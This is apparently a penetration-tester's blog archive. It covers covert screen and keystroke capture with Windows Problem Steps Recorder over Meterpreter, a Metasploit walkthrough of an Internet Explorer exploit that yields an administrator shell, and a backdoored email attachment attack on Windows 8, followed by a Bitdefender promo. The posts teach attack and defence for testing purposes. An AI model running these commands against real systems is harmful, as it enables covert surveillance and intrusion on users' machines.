Using Problem Steps Recorder (PSR) Remotely with Metasploit

Windows includes a built in program that captures screenshots and text descriptions of what a user is doing on their system. This program could be accessed remotely by a hacker. In this article we will see how to run the program from a remote shell using Metasploit.

Introduction

Windows includes a great support program that you have probably never heard of called “Problem Steps Recorder” (psr.exe). Microsoft made this program to help troubleshooters see step-by-step what a user is doing. If a user is having a computer problem that they either can’t articulate well or tech support just can’t visualize the issue, all the support personnel needs to do is have the user run psr.exe.

When PSR runs it automatically begins capturing screen captures of everything that the user clicks on, it also keeps a running dialog of what the user is doing in a text log. When done, the data is saved into an HTML format and zipped so all the user needs to do is e-mail this to the tech support department.

I have honestly never heard of PSR before yesterday when Mark Burnett (@m8urnett) mentioned it on Twitter:

PSR Metasploit 1

Creepy indeed, but I thought that if you could run it remotely, it would be a great tool for a penetration tester. Well, you can! Though running PSR as an attack tool isn’t a new idea. I did some searching and it is mentioned multiple times over the last several years in this manner. Pipefish even mentions using it with Metasploit back in this 2012 article (http://pipefish.me/tag/psr-exe/).

To use Steps Recorder normally, all you need to do is click the start button in Windows and type “psr” into the search box. Then click on “Steps Recorder”.

A small user interface opens up:

PSR Metasploit 2

Just click “Start Record” to start. It then immediately begins grabbing screenshots. It displays a red globe around the pointer whenever a screenshot is taken. Then press “Stop Recording” when done. You will then be presented with a very impressive looking report of everything that you did. You then have the option of saving the report.

PSR can be run from the command prompt. Below is a listing of command switches from Microsoft :

psr.exe [/start |/stop][/output <fullfilepath>] [/sc (0|1)] [/maxsc <value>]
[/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
[/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
[/stopevent <eventname>] [/maxlogsize <value>] [/recordpid <pid>]

/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.
/maxsc Maximum number of recent screen captures.
/maxlogsize Maximum log file size (in MB) before wrapping occurs.
/gui Display control GUI.
/arcetl Include raw ETW file in archive output.
/arcxml Include MHT file in archive output.
/recordpid Record all actions associated with given PID.
/sketch Sketch UI if no screenshot was saved.
/slides Create slide show HTML pages.
/output Store output of record session in given path.
/stopevent Event to signal after output files are generated.

Using PSR remotely with Metasploit

Using the command line options, PSR works very nicely with Metasploit in a penetration testing scenario. I will start with an active remote Meterpreter session between a test Windows 7 system and Kali Linux. There are many ways that you could do this, but I simply made a short text file as seen below:

  • psr.exe /start /gui 0 /output C:\Users\Dan\Desktop\cool.zip;
  • Start-Sleep -s 20;
  • psr.exe /stop;

The commands above start PSR, turns off that pesky Gui window that pops up when running and turns off the red pointer glow when recording pages. It then saves the file to the desktop.

The script waits 20 seconds and then stops recording.

I then encoded the command and ran it in a command shell:

PSR Metasploit 3
After 20 seconds a new “cool.zip” file popped up on the Windows 7 desktop:

PSR Metasploit 4
This file contained a complete step by step list of everything the user did during the 20 second window. At the top of the file are the screenshots:

PSR Metasploit 5
And at the bottom was the step by step text log:

PSR Metasploit 6
I actually like using PSR now better than Metasploit’s built in screenshot capability, especially with the blow by blow text log that is included. The script also worked well against Windows 10 with some minor tweaks.

Defending against this attack

Problem Steps Recorder can be disabled in group policy. Though I did not see anywhere on how to completely uninstall PSR.

The best defense is to block the remote connection from being created, so standard security practices apply. Keep your operating systems and AV up to date. Don’t open unsolicited, unexpected or questionable e-mail attachments. Avoid questionable links, be leery of shortened URLs and always surf safely.

If you want to learn more about computer security testing using Metasploit and Kali Linux, check out my latest book, “Intermediate Computer Security Testing with Kali Linux 2”.

Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit

IE Zero Day 2

The end of the year saw several zero day exploits being released. One for RealPlayer version 15 and under, one for Nvidia Video Cards, and what we will focus on today, a remote exploit for Internet Explorer Version 6-8. The Internet Explorer Zero-Day exploit that was publicly acknowledged on December 29th, affects Windows XP SP3, Vista, Windows 7 and Server 2003 and 2008. Systems running IE 9 and 10 are not affected.

The exploit code has been publicly released and has already been added to Metasploit. We will demonstrate the exploit using Backtrack 5r3 and a Windows XP sp3 system.

So let’s get started.

  • Boot up your Backtrack 5 system and run the msfupdate command to make sure you get the latest exploits.

(Had a heck of a time with running the updates lately. Most recently it seemed to hang on updating an outlook.rb file. I got by it earlier by deleting the file and re-running the update. But for this example we won’t be needing it, so you can just hit (p) for postpone if it hangs on updating it.)

  • Next start the msfconsole.
  • Now you can search for the internet explorer exploit by typing “search internet explorer” or by just typing it in as below.

At the msf> prompt type:

  • use exploit/windows/browser/ie_cbutton_uaf

Then type “show options” to see what options can be set:

IE Zero Day 2

Okay, we will need to set the SRVHOST option to point to our Backtrack system. And we can change the URIPATH to something else other than random if we want. But first, let’s set the target as it defaults to Windows 7, and our target in this example is a Windows XP system:

IE Zero Day 1

Next, set the IP address of your Backtrack system:

  • set SRVHOST 192.168.0.120

And finally run the exploit:

  • exploit

IE Zero Day 4-1

Okay, at this point Metasploit starts up the Apache web server,creates the exploit and creates a random page to host it on. Now all we need is to surf to the URL given to us by Backtrack 5 using Internet Explorer on the Windows XP system:

IE Zero Day 3

That is it!

As soon as the user surfs to our Backtrack page, the exploit is run and a remote session is created:

IE Zero Day 4-2

(Note: There were no real warnings or alerts on the Windows XP side. It just seemed that the webpage didn’t do anything.)

We can type “sessions -l” to list all the remote shell sessions that Backtrack has created.

IE Zero Day 5

As you can see our Windows XP session is listed. Now if we simply connect to the session interactively (sessions -i 1), and run “getuid” we see that we have an administrator level shell:

IE Zero Day 6

And simply running “shell” drops us into the full remote shell:

IE Zero Day 7

So how do we stop this attack? If you are running older versions of Internet Explorer, UPDATE NOW! This attack does not work against the latest version of IE. Microsoft was supposed to release a patch for older IE versions today, to stop this attack, but they didn’t do it.

And with the fix really being to simply upgrade to the newest version, they probably won’t any time soon.

The fix is also the same with the RealPlayer and Nvidia Zero-days that I mentioned earlier. Simply download the latest updates of the software to protect against the exploits.

Windows 8 – Social Engineering, Remote Shells and the Weakest Security Link

Windows 8 Screenshot in Backtrack 5

Windows 8 security features have been vastly improved over Windows 7 and XP. And it will stop many attacks that still work in the older versions of Windows. But with all of it’s advances the main security weakest link still remains – the user.

I have installed and supported Microsoft products from MS Dos 2.2 to the current systems. But I do confess, as with Windows ME and Vista, I am no fan of Windows 8. But I must admit, it is more secure than Windows 7. But, like it’s predecessors, it has one fatal flaw.

It let’s users run programs.

Granted it does it’s best to warn them that the “uber cool” program that they MUST have probably isn’t safe. Even stopping them when they had it sent to them via e-mail and they tried to run it.

As we see here:

Windows Protected your PC

This ends the malicious social engineering e-mail attack attempt. Some user’s would accept defeat at this point, and hit the big “OK” button, which returns the user to the safety of the desktop. So, foiled again in their attempt to ruin your day, they leave their desktop and go to find a printer that they can jam.

But this just won’t do for the determined user. You know, the one who’s sole purpose in life is to circumvent every security feature that you try to protect them with.  So, of course, they hit the small “more info” link on the security message above. And Windows 8 gives them one more chance to stop the attack:

Unknown Publisher

And, as you know, most users will promptly see the error of their ways, and select “Don’t Run”.

Okay, who am I kidding?

Of course they are going to hit “Run Anyway”. They came this far, why stop now? Besides, their life would not be fulfilled without installing the “Christmas Caroling Puppies” app that the accompanying e-mail said was very cool and that they had to see.

Luckily, there were no calls to the IT Support desk (two weeks later) complaining that our user’s system is crashing and running really slow. Because, in this simulated attack, the built in Microsoft Anti-Virus stopped the backdoored file from running.

As you can see from the above, even though the user made a bad mistake of trying to run an executable file they received from an unsolicited e-mail (or visiting a suspicious site), Windows 8 still tried to warn them of danger.

But all the extra security warnings may not be the case if Windows 8 doesn’t see anything suspicious with the malicious file. As in our next sample case.

Okay, same situation, our user gets an unsolicited e-mail about Christmas Puppies. Of course the user opens and runs the attachment. But this time, nothing seems to happen. No warnings or anything. So our bored user heads out to find a server to crash. Besides, it is 4pm on Friday, what else is there to do?

But what the unsuspecting user doesn’t know, is that the file was a backdoored program that allowed a remote connection to an attacker’s system. A Backtrack 5 system in our case.

And on the attacker’s system a new session appears:

Sessions 1

As you can see, the attacker connects to the remote system, and runs “sysinfo” to see what version of Windows the victim is using:

sysinfo

He then checks the running processes:

Process List

Grabs a screenshot of the users Desktop (see image at top of post), and then kicks off a remote keyscan:

Keyscan

Hmm… Looks like our user returned, hit the left “Windows” key, then wrote “this is a test” and hit the “return” key. The attacker didn’t get anything important from the keyscan, so he just decides to drop to a full remote shell:

Win8shell

Game Over!

The attacker has full control of the box and can do whatever he wants, including using this box to attack other systems on the network. All from our user allowing a malicious e-mail attachment to run. And as this attack was not detected by Windows 8 security, the user was offered no extra help in choosing the best course of action in stopping the attack.

This was a fully updated install of Windows 8 with the latest Java installed and the built in Firewall and Anti-Virus enabled. As you can see, no matter how good the security products are – and Windows 8 is very good – many times the security of your network is in the hands of your users.

Train them well.

Bitdefender Security for Windows 8 Released

A few days ago Bitdefender released a new version of it’s award winning security software – Bitdefender Windows 8 Security. This release is the first Anti-Virus security program built especially for Windows 8.

If you are familiar with Bitdefender’s Internet Security Suite 2013, then the features will look very familiar to you. Sure, it has the award winning Anti-Virus and phishing defense, Firewall, Intrusion Detection System, Social Media and Online Banking/ Shopping protection. But there are several new features built in just for Windows 8.

Probably one of the top features is the Early Start-Up Scanner that loads Bitdefender first so that it can defend against malicious software from infecting your computer during start-up. Also very important is Bitdefender’s new support for Windows 8 Apps. And scanning is also quicker with Scan-Boost technology.

Bitdefender’s feature set far surpasses the built in Microsoft Anti-Virus. Their Windows 8 Security program costs $74.95 for for up to 3 PC’s for a Year. If you are still not convinced, and want to take it for a test drive you can download a free trial version from their website.

Bitdefender Windows 8 Security – Check it out!